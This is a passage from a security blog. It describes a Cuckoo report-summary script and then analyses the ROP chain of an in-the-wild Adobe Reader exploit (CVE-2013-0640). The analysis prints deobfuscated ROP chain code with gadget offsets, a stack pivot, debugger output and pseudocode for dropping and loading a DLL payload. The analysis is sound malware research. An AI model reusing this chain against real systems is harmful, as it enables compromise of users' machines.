  • Jinja2 (which if you are generating reports on Cuckoo, you already have!)
Usage:



--path: Where your analyses folder is for Cuckoo; this is generally /home/$USER/cuckoo/storage/analyses

--template: The Jinja template to be used for the output. I have included a basic template with the script (called template.html)

--output: Where you want the created HTML file to be saved

Example



This will generate an HTML file based on the analyses you have in the given path, pulling certain attributes from the JSON report:

  • Filename
  • Yara Hits (if any)
  • Virus Total Response Code
  • Virus Total Verbose Response
  • Number of Positive Hits from VT (if any)
  • URL to VirusTotal report (if there are hits)
  • Link to the Cuckoo HTML Report


Sample Output



The script iterates through all the folders in the path you give as a parameter and, for each of those folders, looks for the report.json file. If it can’t find the report file (i.e. Cuckoo couldn’t generate a report for whatever reason), the script lets you know and moves on.

From there, the script parses the JSON and stores the desired fields as variables. These are then passed to Jinja, which renders them using the template provided with the ‘-t’ argument. The result is the pretty (OK, not so pretty) output seen in the last figure above.

The cool thing is that with a little knowledge of Jinja, you can add more fields to the output as your analysis requires.
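
For reference, the core of that loop looks roughly like the sketch below. This is a simplified re-creation rather than the script's actual code, and the report.json key names (target/file/name, etc.) and the analyses path are assumptions that may differ between Cuckoo versions:

import json
import os
from jinja2 import Template   # Jinja2 is already a Cuckoo reporting dependency

def collect_reports(analyses_path):
    rows = []
    for task_id in sorted(os.listdir(analyses_path)):
        # Per-analysis JSON report; adjust the sub-path if your setup differs.
        report_path = os.path.join(analyses_path, task_id, "reports", "report.json")
        if not os.path.isfile(report_path):
            print("[!] No report.json for analysis %s, skipping" % task_id)
            continue
        with open(report_path) as fh:
            report = json.load(fh)
        rows.append({
            "task_id": task_id,
            "filename": report.get("target", {}).get("file", {}).get("name", "?"),
            "yara": report.get("target", {}).get("file", {}).get("yara", []),
        })
    return rows

if __name__ == "__main__":
    rows = collect_reports("/home/cuckoo/cuckoo/storage/analyses")
    html = Template(open("template.html").read()).render(rows=rows)
    open("summary.html", "w").write(html)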

Analysis of a Malware ROP Chain

By Brad Antoniewicz.

Back in February an Adobe Reader zero-day was found being actively exploited in the wild. You may have seen an analysis of the malware in a number of places. I recently came across a variant of this malware and figured it would be nice to provide a little more information on the ROP chain contained within the exploit.

Background

After Adobe was notified of the exploit their analysis yielded two vulnerabilities: CVE-2013-0640 and CVE-2013-0641. Initially the ambiguity of the vulnerability descriptions within the advisories made it hard to tell if both CVE-2013-0640 and CVE-2013-0641 were being exploited in the variant I came across - but from what I can put together, CVE-2013-0640 was used in the initial exploit for memory address disclosure and code execution. Then the exploit transfers control to another DLL that escapes the Adobe Reader sandbox by exploiting CVE-2013-0641.

Exploit Characteristics

Once I get past the malicious intent, I'm one of those people who can appreciate a nicely written exploit or piece of malware. This variant was particularly interesting to me because it exploited a pretty cool vulnerability and showed signs of sophistication. However, at the same time, there was tons of oddly structured code, duplication, and overall unreliability. It was almost like one person found the crash, one person wrote the ROP chain, and a final person hacked everything together and filled in the gaps. If this was my team, I'd fire that final person :)

In this section we'll cover the general characteristics of the exploit that serve as an important background but are not directly part of the ROP chain.

Javascript Stream

The exploit is written in Javascript embedded into a PDF stream. Extracting the Javascript is pretty straightforward:

 root@kali:~# pdfextract evil.pdf
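
If pdfextract isn't available, a rough Python equivalent for simple FlateDecode streams is only a few lines (my own sketch; it won't handle object streams, filter chains, or the deliberately malformed structures malicious PDFs often use):

import re
import sys
import zlib

raw = open(sys.argv[1], "rb").read()

# Grab everything between stream/endstream markers and try to inflate it.
for i, blob in enumerate(re.findall(rb"stream\r?\n(.*?)\r?\nendstream", raw, re.S)):
    try:
        data = zlib.decompress(blob)
    except zlib.error:
        continue  # not FlateDecode, or extra filters are applied
    if b"unescape" in data or b"eval" in data:
        out = "stream_%02d.js" % i
        open(out, "wb").write(data)
        print("[+] wrote %s (%d bytes)" % (out, len(data)))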



Obfuscation



The Javascript was similar to how it was described in previous articles: It appeared to be at least partially obfuscated, but had some readable Italian/Spanish word references throughout. For example:

ROP_ADD_ESP_4 = 0x20c709bb;
.
.
.
pOSSEDER[sEGUENDO - 1] += "amor";
pOSSEDER[sEGUENDO - 5] += "fe";
pOSSEDER[sEGUENDO - 10] += "esperanza";




Most everything in this article is the result of my manual deobfuscation of the JavaScript (lots of find and replace).

A similar Javascript exploit was found posted on a Chinese security forum. I can't say how or if the two are connected; it's possible the Chinese site just put friendly names to the obfuscated functions. It just struck me as odd that the post named functions and variables so precisely with little structural change from the obfuscated version.

Version Support

The exploit first checks the result of app['viewerVersion'] to determine the Reader version. The following versions appear to be supported within the exploit:
  • 10.0.1.434
  • 10.1.0.534
  • 10.1.2.45
  • 10.1.3.23
  • 10.1.4.38
  • 10.1.4.38ARA
  • 10.1.5.33
  • 11.0.0.379
  • 11.0.1.36
  • 9.5.0.270
  • 9.5.2.0
  • 9.5.3.305
The author developed an entire ROP chain for each version, which surely took some time to do. I looked at 10.1.2.45, which is the focus of this article.

ASLR



The address leak vulnerability in AcroForm.api facilitated an ASLR bypass by providing the module load address of AcroForm.api. The exploit writers had to first trigger the vulnerability, get the module load address, then adjust the offsets in the ROP chain at runtime before loading it into memory.

Stack Pivot

Once the code execution vulnerability is triggered, the exploit directs Reader to a stack pivot ROP gadget that transfers control from the program stack to the ROP chain that is already loaded into memory on the heap. Oddly the stack pivot address is defined within a variable inside the JavaScript ROP chain build function, rather than being part of the returned ROP Chain string. Instead of simply defining the stack pivot address as an offset, the exploit writer defined it as an absolute address using the default IDA load address.

Later on in the exploit the writer actually subtracts the default load address from this gadget address to get the offset, then adds the leaked address. This is a totally different programmatic approach from the one used elsewhere in this function to calculate a gadget's address, which may indicate this exploit was developed by more than one author, or that an IDA plugin was used to find the stack pivot. Here are the important parts of the JavaScript associated with the stack pivot to illustrate this conclusion:

 function getROP(AcrobatVersion,moduleLoadAddr){
.
.
.
else if(AcrobatVersion == '10.1.2.45'){
var r="";
r+=getUnescape(moduleLoadAddr+0x17);
r+=getUnescape(moduleLoadAddr+0x17);
.
.
.
}
STACK_PIVOT = 0x2089209e ;
return r;
}
var ropString = getROP(AdobeVersionStr['AcrobatVersion'], moduleLoadAddr);
var idaLoadAddr= (0x20801000);

stackPivotOffset = getUnescape(STACK_PIVOT - idaLoadAddr + moduleLoadAddr);



As you can see, there are two methods here, the simple "getUnescape(moduleLoadAddr+0x17);" and the more complex "getUnescape(STACK_PIVOT - idaLoadAddr + moduleLoadAddr);".

Rather than digging through the exploit code, an easy way to identify the stack pivot within WinDBG is to set a breakpoint on one of the first ROP gadgets in the Javascript ROP chain build function: moduleOffset+0x41bc90 -

 0:000> lmf m AcroForm
start end module name
63a80000 64698000 AcroForm C:\Program Files\Adobe\Reader 10.0\Reader\plug_ins\AcroForm.api
0:000> uf 63a80000 + 1000 + 0x41bc90
AcroForm!DllUnregisterServer+0x39dc1a:
63e9cc90 54 push esp
63e9cc91 5e pop esi
63e9cc92 c3 ret
0:000> bp 63a80000 + 1000 + 0x41bc90
0:000> g



When the breakpoint is reached, we can look at where the stack pointer is pointing. Since it's pointing at memory on the heap (and not the stack) we know the stack pivot executed.
 Breakpoint 5 hit
eax=0000f904 ebx=00000001 ecx=63b1209e edx=00000000 esi=165acd6c edi=05c49f18
eip=63e9cc90 esp=118455ac ebp=001ede18 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
AcroForm!DllUnregisterServer+0x39dc1a:
63e9cc90 54 push esp




At this breakpoint we also know the heap block where the ROP chain was loaded (ESP is pointing to it). We can use !heap to find the start of the heap block and inspect it. At offset 0x4 is the stack pivot:

 0:000> !heap -p -a esp
address 118455ac found in
_HEAP @ 1ab0000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
1183f8f8 1927 0000 [00] 1183f900 0c930 - (busy)

0:000> dd 1183f900
1183f900 00380038 63b1209e 63a81017 63a81017
1183f910 63a81017 63a81017 63a81017 63a81017
1183f920 63a81017 63a81017 63a81017 63a81017
1183f930 63a81017 63a81017 63a81017 63a81017
1183f940 63a81017 63a81017 63a81017 63a81017
1183f950 63a81017 63a81017 63a81017 63a81017
1183f960 63a81017 63a81017 63a81017 63a81017
1183f970 63a81017 63a81017 63a81017 63a81017

0:000> uf 63b1209e
AcroForm!DllUnregisterServer+0x13028:
63b1209e 50 push eax
63b1209f 5c pop esp
63b120a0 59 pop ecx
63b120a1 0fb7c0 movzx eax,ax
63b120a4 c3 ret



JavaScript DLLs

At the end of every version-dependent ROP chain is:
 0x6f004d
0x750064
0x65006c



Which is the hexadecimal equivalent of the unicode string "Module". Appended to that is a larger block of data. Later on we'll determine that the ROP chain searches the process memory for this specific delimiter ("Module") to identify the block, which is the start of a base64-encoded DLL that gets loaded as the payload.

ROP Pseudocode

Before we dig into the assembly of the ROP chain, let's look at it from a high level. It uses the Windows API to retrieve a compressed base64 encoded DLL from memory. It decodes it, decompresses it, and loads it. If we were to translate its assembly to a higher level pseudo code, it would look something like this:
 hModule = LoadLibraryA("MSVCR90.DLL");
__wcsstr = GetProcAddress(hModule, "wcsstr");
base64blob = __wcsstr(PtrBlob, "Module");

hModule = LoadLibraryA("Crypt32.dll");
__CryptStringToBinaryA = GetProcAddress(hModule, "CryptStringToBinaryA");
__CryptStringToBinaryA(base64blob, 0, CRYPT_STRING_BASE64, decodedBlob, pcbBinary, pdwSkip, pdwFlags );

hModule = LoadLibraryA("NTDLL.dll");
__RtlDecompressBuffer = GetProcAddress(hModule, "RtlDecompressBuffer");
__RtlDecompressBuffer(COMPRESSION_FORMAT_LZNT1, decompressedBlob, UncompressedBufferSize, decodedBlob, CompressedBufferSize, FinalUncompressedSize);

hModule = LoadLibraryA("MSVCR90.DLL");
__fwrite = GetProcAddress(hModule, "fwrite");

hModule = LoadLibraryA("Kernel32.dll");
__GetTempPathA = GetProcAddress(hModule, "GetTempPathA");

tmpPath = "C:\Users\user\AppData\Local\Temp\";
__GetTempPathA(nBufferLength , tmpPath);

tmpPath += "D.T";

hFile = fopen(tmpPath, "wb");
fwrite(decompressedBlob, size, count, hFile);
fclose(hFile);

LoadLibraryA("C:\Users\user\AppData\Local\Temp\D.T");
Sleep(0x1010101);
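
Since these are all documented Windows APIs, the same decode-and-decompress steps can be replayed offline to recover the embedded DLL once the blob has been carved out of the PDF. The sketch below is my own analysis helper, not part of the exploit: it substitutes Python's base64 module for CryptStringToBinaryA and calls ntdll!RtlDecompressBuffer through ctypes, so it only runs on Windows.

import base64
import ctypes
from ctypes import wintypes

COMPRESSION_FORMAT_LZNT1 = 0x0002
ntdll = ctypes.WinDLL("ntdll")

def recover_dll(b64_blob, max_size=0x400000):
    """Base64-decode and LZNT1-decompress the blob that follows the
    unicode 'Module' delimiter, returning the raw DLL bytes."""
    compressed = base64.b64decode(b64_blob)
    out = ctypes.create_string_buffer(max_size)
    final_size = wintypes.ULONG(0)
    status = ntdll.RtlDecompressBuffer(
        COMPRESSION_FORMAT_LZNT1,
        out, max_size,
        compressed, len(compressed),
        ctypes.byref(final_size))
    if status != 0:
        raise RuntimeError("RtlDecompressBuffer failed: 0x%08x" % (status & 0xFFFFFFFF))
    return out.raw[:final_size.value]

# Usage (blob carved out of the PDF after the 'Module' marker):
# open("D.T", "wb").write(recover_dll(blob))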



Setup

The first thing the ROP Chain does is note where it is in memory. We'll see later on that it does this so it can dynamically modify the arguments passed to the functions it calls rather than using static values.

 r+=ue(t+0x41bc90) ; // push esp/pop esi/ret



The r variable is returned to the caller as the ROP chain, ue() returns an unescape()'ed string built from the parameter it was passed, and the t variable is the AcroForm.api module load address.

The pseudocode above shows that a number of calls, particularly the ones to LoadLibraryA() and GetProcAddress(), require strings as arguments. The ROP Chain accomplishes this by directly copying the strings into the .data segment of AcroForm.api.



A snip of JavaScript code responsible for this is below:

 r+=ue(t+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818001); // data_segment + 0x1
r+=getUnescape(moduleLoadAddr+0x5efb29); // pop ecx/ret
r+=getUnescape(0x54746547); // string
r+=getUnescape(moduleLoadAddr+0x46d6ca); // mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818005); // data_segment + 0x5
r+=getUnescape(moduleLoadAddr+0x5efb29); // pop ecx/ret
r+=getUnescape(0x50706d65); // string + 0x4
r+=getUnescape(moduleLoadAddr+0x46d6ca); // mov [eax], ecx/ret



These groups of instructions are repeated for each DWORD for the length of the string, incrementing the data_segment and string offsets respectively. The entire string that is copied to the .data segment is:

 0:008> db 63470000 + 1000 + 0x818001 L4e
63c89001 47 65 74 54 65 6d 70 50-61 74 68 41 00 66 77 72 GetTempPathA.fwr
63c89011 69 74 65 00 77 62 00 43-72 79 70 74 53 74 72 69 ite.wb.CryptStri
63c89021 6e 67 54 6f 42 69 6e 61-72 79 41 00 6e 74 64 6c ngToBinaryA.ntdl
63c89031 6c 00 52 74 6c 44 65 63-6f 6d 70 72 65 73 73 42 l.RtlDecompressB
63c89041 75 66 66 65 72 00 77 63-73 73 74 72 00 41 uffer.wcsstr.A




As you can see, the strings for each of the function arguments are present.
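
Those constants are just the target strings packed into little-endian DWORDs, NUL-terminated and padded with 'A' bytes that the next write overlaps. A quick Python check (my own, for verification only):

import struct

def to_dwords(s, pad=b"A"):
    data = s.encode() + b"\x00"           # NUL terminator written with the string
    data += pad * (-len(data) % 4)        # 'A' padding, later overwritten by the next string
    return [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data), 4)]

print([hex(d) for d in to_dwords("GetTempPathA")])
# ['0x54746547', '0x50706d65', '0x41687461', '0x41414100']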

Function Calls

The rest of the ROP Chain is mostly the same couple of steps repeated:

  1. Prepare arguments for function calls
  2. Call LoadLibraryA()
  3. Call GetProcAddress()
  4. Call function
It performs these steps for the calls to wcsstr(), CryptStringToBinaryA(), RtlDecompressBuffer(), fwrite(), GetTempPathA(), and fclose(). Let's see what one of these calls looks like:

Call to wcsstr()

The ultimate goal of the following series of instructions is to set up the stack to make a call to wcsstr(). MSDN shows that the call should look like this:

 wchar_t *wcsstr(
const wchar_t *str,
const wchar_t *strSearch
);



For the *strSearch parameter the author placed a pointer in the JavaScript ROP Chain to the .rdata segment of AcroForm.api which contains the unicode string "Module". Then to determine the *str parameter, the author used the saved stack pointer gathered in the first few instructions of the ROP Chain to calculate the memory address of *strSearch on the stack and place it at the precise offset on the stack where wcsstr() will look for it once called. Really any pointer to a memory address within the ROP Chain could have been used as the *str parameter, since it's at the end of the ROP Chain where the unicode string "Module" was added by the author to indicate the start of the payload. Come to think of it, the author could have probably just calculated the offset to the end of the ROP Chain and skipped the entire wcsstr() call.

Let's see the JavaScript and assembly. This first set of gadgets simply determines the memory address on the stack of the pointer to the "Module" unicode string in the .rdata segment of AcroForm.api. Remember, esi was used at the start of the ROP chain to store the stack pointer after the pivot.

r+=getUnescape(moduleLoadAddr+0x5ec230); // pop edi/ret
r+=getUnescape(0xcccc0240);
r+=getUnescape(moduleLoadAddr+0x4225cc); // movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); // ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); // add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x538c1d); // xchg eax,edi/ret
r+=getUnescape(moduleLoadAddr+0x508c23); // xchg eax,ecx/ret



One note is the use of 0xcccc0240 as the offset. It turns into 0x00000240 after the movsx edi, di (a quick sanity check is sketched below). My guess is that the author was trying to avoid nulls within the chain, but if you look at other areas of the payload, there are tons of nulls used. This implies that avoiding nulls was not needed, making it extra, unneeded work by the author. It makes me wonder if it indicates an automatically generated ROP chain or possibly a chain borrowed from another exploit.
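
A quick way to convince yourself of that truncation (my own check, not part of the exploit):

import ctypes

val = 0xcccc0240
# movsx edi, di keeps only the low 16 bits of edi and sign-extends them;
# 0x0240 has its top bit clear, so the result is simply 0x00000240.
low16 = ctypes.c_int16(val & 0xFFFF).value
print(hex(low16 & 0xFFFFFFFF))   # 0x240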

At the end of this set of instructions, the memory address on the stack of the pointer to the .rdata "Module" string resides in ecx.

The next set of instructions determines the offset on the stack where the *str parameter would be. The JavaScript ROP Chain contains 0x41414141 at that offset, but the last two instructions overwrite that value with the memory address on the stack of the pointer to the .rdata "Module" string.

r+=getUnescape(moduleLoadAddr+0x5ec230); // pop edi/ret
r+=getUnescape(0xcccc023c);
r+=getUnescape(moduleLoadAddr+0x4225cc); // movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); // ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); // add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); // push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); // mov [eax], ecx/ret



At this point, the stack is populated with the appropriate parameters at the appropriate places so that the call to wcsstr() can search the memory region where the ROP Chain is for the unicode string of "Module" - which indicates the start of the payload.

However, calling wcsstr() isn't that simple. In the next set of instructions, the author calls LoadLibraryA() to load MSVCR90.dll, which is the first step in preparing to call the function. The LoadLibrary() function is pretty straightforward to call:

HMODULE WINAPI LoadLibrary(
_In_ LPCTSTR lpFileName
);



With that as a reference, let's look at the ROP Chain:

r+=getUnescape(moduleLoadAddr+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); // 65cf2214={kernel32!LoadLibraryA (769d2864)} ; Address to kernel32!LoadLibraryA
r+=getUnescape(moduleLoadAddr+0x4b1788); // call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x816e96); // ptr to "MSVCR90.dll"
r+=getUnescape(moduleLoadAddr+0x508c23); // xchg eax,ecx/ret



This is a pretty simple set of instructions: the author loads the address in the import table for LoadLibraryA() into eax, then calls it. When LoadLibraryA() looks on the stack for its parameters, it'll see the pointer to the .rdata segment of AcroForm.api which contains the string "MSVCR90.dll". The return value is a handle to the module, set in eax and then immediately copied to ecx.

Next the author has to save the handle at the specific offset on the stack where the next call to GetProcAddress() will look for it. This should look familiar; it's essentially the same sequence of instructions that the author used to set up the stack for the wcsstr() call (which hasn't happened yet).

r+=getUnescape(moduleLoadAddr+0x5ec230); // pop edi/ret
r+=getUnescape(0xcccc022c);
r+=getUnescape(moduleLoadAddr+0x4225cc); // movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); // ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); // add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); // push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); // mov [eax], ecx/ret



A call to GetProcAddress() follows; let's see how to call it:

FARPROC WINAPI GetProcAddress(
_In_ HMODULE hModule,
_In_ LPCSTR lpProcName
);



In a similar fashion to the LoadLibraryA() call, the import address for GetProcAddress is loaded into eax and called. The 0x41414141 was overwritten in the previous set of instructions and now contains the handle that was returned from the LoadLibraryA() call, which is used for the hModule parameter. The lpProcName parameter was defined in the setup part of the ROP Chain where the author copied the string to the data segment of AcroForm.api. The address to the precise area of the data segment which contains the "wcsstr" string was already populated in the JavaScript.

r+=getUnescape(moduleLoadAddr+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); // Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); // call [eax]/ret
r+=getUnescape(0x41414141); // Placeholder for ptr to LoadLibrary Handle
r+=getUnescape(moduleLoadAddr+0x818047); // data_segment + 0x47 ("wcsstr")



GetProcAddress will return the address of wcsstr() in eax. The wcsstr() function parameters were already set up earlier on, so all that's left is to call eax. The last line adjusts eax so that it points to the start of the payload, and not at the "Module" delimiter.

r+=getUnescape(moduleLoadAddr+0x154a); // jmp     eax {MSVCR90!wcsstr (7189752c)}
r+=getUnescape(moduleLoadAddr+0x5ec1a0); // pop ecx/pop ecx/ret
r+=getUnescape(0x41414141); // Ptr to stack populated during setup
r+=getUnescape(moduleLoadAddr+0x60a990); // Ptr to unicode "Module" in .data
r+=getUnescape(moduleLoadAddr+0x2df56d); // add eax, 0ch/ret



Prepping and Writing the DLL

Now the ROP Chain has a pointer to the compressed base64 encoded DLL. The rest of the chain decodes (CryptStringToBinaryA), decompresses (RtlDecompressBuffer) and writes the DLL to "C:\Users\user\AppData\Local\Temp\D.T" using the same high level gadgets just described in this section. It uses GetTempPathA() to determine the user's temporary file store, which is where the DLL is saved.

Loading the DLL

With the D.T DLL written to disk, loading it is just a matter of calling LoadLibraryA(). The DLL automatically starts its own thread and the remainder of the ROP Chain is just a call to Sleep().

r+=getUnescape(moduleLoadAddr+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); // 65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); // call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x818101); // Loads D.T as a library
r+=getUnescape(moduleLoadAddr+0x51f5fd); // pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f10c0); // ds:0023:65cf20c0={kernel32!SleepStub (769cef66)}
r+=getUnescape(moduleLoadAddr+0x4b1788); // call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x17); // ret
r+=getUnescape(0x1010101);



Full ROP Chain

Here's the ROP Chain in its entirety; I manually deobfuscated it and added the assembly annotations.

r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x17); //ret

r+=getUnescape(moduleLoadAddr+0x41bc90); //push esp/pop esi/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818001); //data_segment + 0x1
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x54746547);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret ;
r+=getUnescape(moduleLoadAddr+0x818005); //scratch_space + 0x5
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x50706d65);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818009); //scratch_space + 0x9
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41687461);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81800d); //scratch_space + 0xd
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41414100);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81800e); //scratch_space + 0xe
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x69727766);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818012); //scratch_space + 0x12
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41006574);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818015); //scratch_space + 0x15
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41006277);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818018); //scratch_space + 0x18
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x70797243);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81801c); //scratch_space + 0x1c
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x72745374);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818020); //scratch_space + 0x20
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x54676e69);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818024); //scratch_space + 0x24
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x6e69426f);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818028); //scratch_space + 0x28
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41797261);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81802c); //scratch_space + 0x2c
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41414100);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81802d); //scratch_space + 0x2d
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x6c64746e);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818031); //scratch_space + 0x31
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x4141006c);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

